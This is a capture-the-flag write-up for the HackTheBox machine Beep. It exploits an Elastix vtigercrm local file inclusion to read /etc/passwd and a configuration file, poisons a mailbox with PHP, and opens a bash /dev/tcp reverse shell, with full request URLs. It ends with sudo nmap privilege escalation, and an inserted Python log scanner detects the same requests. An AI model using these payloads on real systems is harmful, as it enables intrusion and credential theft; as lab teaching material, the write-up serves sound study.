HTB: Beep Writeup w/o Metasploit

cyber shinobii
4 min read, Dec 28, 2021

Introduction

Beep was a pretty fun box to play with. We did a live hacking session on this box. It was cool to have people with different skill sets from diverse backgrounds all working together on Beep. We ended up finding a few different ways to pop a shell. We will explore one of those vectors within this writeup. If you would like to see the other exploits, please check out the video walkthrough here.

Recon

We started off this challenge with a few Nmap scans. The version scan showed us a few interesting ports and services running.

Ports 80 and 443 are open and appear to be hosting some sort of web service. When we browse to the address, we are welcomed with a username and password form for Elastix. Elastix is a unified communication software suite that provides IP PBX, email, instant messaging, faxing, and other communication services. After exploring it a bit more, you will learn that tools like this are used a lot in call centers, and also at help desks and in system admin roles.

Enumeration

We were curious about what Elastix was and whether there were any known exploits, so we threw it into a Google search. As a result, we found an interesting local file inclusion (LFI) exploit, which we also saw in a searchsploit search.

We were not entirely sure this would work because we did not have a version number for our Elastix service. Fortunately, it did work, and we were able to read files on the system. FYI: right-click and select "view source" so the output is clean and easier to read.

https://beep.htb/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
https://beep.htb/vtigercrm/graph.php?current_language=../../../../../../../..//etc/passwd%00&module=Accounts&action

We can read local files, even the sensitive ones. From here we will try to get a shell to execute some remote commands. To do this we will need to upload some PHP to the system, and then interact with it using our web browser. First, let us upload a line of PHP to the "asterisk" user's mailbox (we found the user account in the /etc/passwd file above). We can do this by connecting to the SMTP server on port 25 and sending the asterisk account an email.

The email is sent. Let us use the LFI vulnerability to look at the directory (/var/mail/asterisk) storing our mail.

https://beep.htb/vtigercrm/graph.php?current_language=../../../../../../../..//var/mail/asterisk%00&module=Accounts&action

The email is there; now all we must do is send commands to the 'kage' parameter we set in that PHP string.

https://beep.htb/vtigercrm/graph.php?current_language=../../../../../../../..//var/mail/asterisk%00&module=Accounts&action&kage=whoami

Running whoami returns the “asterisk” user account. Running commands works, so let us pass a command to connect back to a netcat listener running on our attacking machine.

https://beep.htb/vtigercrm/graph.php?current_language=../../../../../../../..//var/mail/asterisk%00&module=Accounts&action&kage=bash+-i+%3E%26+/dev/tcp/10.10.14.13/443+0%3E%261

Running that line above (from a browser) uses bash to connect back to our netcat listener on port 443. We now have a shell we can use to execute remote commands, so let us escalate our privileges. Running sudo -l shows a few commands we can run as root.
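From the defender's side, the requests above leave a very recognisable trail in the web server's access log. The following script is an added example (not part of the original writeup): it parses Apache-style log lines, decodes the graph.php query string, and flags the traits the LFI abuse relies on, namely directory traversal, a null byte, references to sensitive paths, and an extra parameter like 'kage' that graph.php never expects. The log lines, the log format, and the list of legitimate parameters are constructed assumptions for this demo.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log: one benign request, then requests shaped like the URLs in this writeup.
SAMPLE_LOG = """\
10.10.14.13 - - [28/Dec/2021:10:00:01 +0000] "GET /vtigercrm/graph.php?current_language=en_us&module=Accounts&action HTTP/1.1" 200 512
10.10.14.13 - - [28/Dec/2021:10:00:05 +0000] "GET /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action HTTP/1.1" 200 4096
10.10.14.13 - - [28/Dec/2021:10:00:09 +0000] "GET /vtigercrm/graph.php?current_language=../../../../../../../..//var/mail/asterisk%00&module=Accounts&action&kage=whoami HTTP/1.1" 200 301
"""

# Common Log Format fields (assumption: the server logs in this format).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})'
)
SENSITIVE_PATHS = ("/etc/", "/var/mail/", "/var/log/", "/proc/")
# Assumption: these are the only parameters graph.php legitimately takes.
EXPECTED_PARAMS = {"current_language", "module", "action"}


def analyze_request(url):
    """Return the list of reasons a graph.php request looks like LFI / include-poisoning abuse."""
    reasons = []
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)  # parse_qs percent-decodes values
    lang = params.get("current_language", [""])[0]
    if "../" in lang or "..\\" in lang:
        reasons.append("path traversal in current_language")
    if "\x00" in lang:
        reasons.append("null byte truncation in current_language")
    if any(p in lang for p in SENSITIVE_PATHS):
        reasons.append("reference to sensitive path")
    extra = set(params) - EXPECTED_PARAMS
    if extra:
        reasons.append("unexpected parameter(s): " + ", ".join(sorted(extra)))
    return reasons


def scan_log(text):
    """Return (ip, url, reasons) for every graph.php request that trips at least one check."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m or "graph.php" not in m.group("url"):
            continue
        reasons = analyze_request(m.group("url"))
        if reasons:
            hits.append((m.group("ip"), m.group("url"), reasons))
    return hits


if __name__ == "__main__":
    for ip, url, reasons in scan_log(SAMPLE_LOG):
        print(f"{ip} {url}\n    -> {'; '.join(reasons)}")
```

The benign request produces no findings, while the two traversal requests are each flagged on several independent traits, so a rule built on any one of them would still catch the activity if an attacker obscured another.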

GTFOBins has a privilege escalation entry for nmap. In a nutshell, you start nmap in interactive mode, making sure to run it with sudo. Once that's done, run "!sh" to get root access.

Conclusion

And we are done; we can go and grab all our flags now. This was a fun box, and this was one way to pop a shell on Beep. Remember, we were able to pop this because Elastix had an LFI vulnerability that we exploited to execute remote commands and connect back to our netcat listener. We were then able to escalate privileges because of the commands the user is allowed to run with sudo. If you would like to watch this exploit and the others, please watch our walkthrough here on YouTube. Thanks for reading!
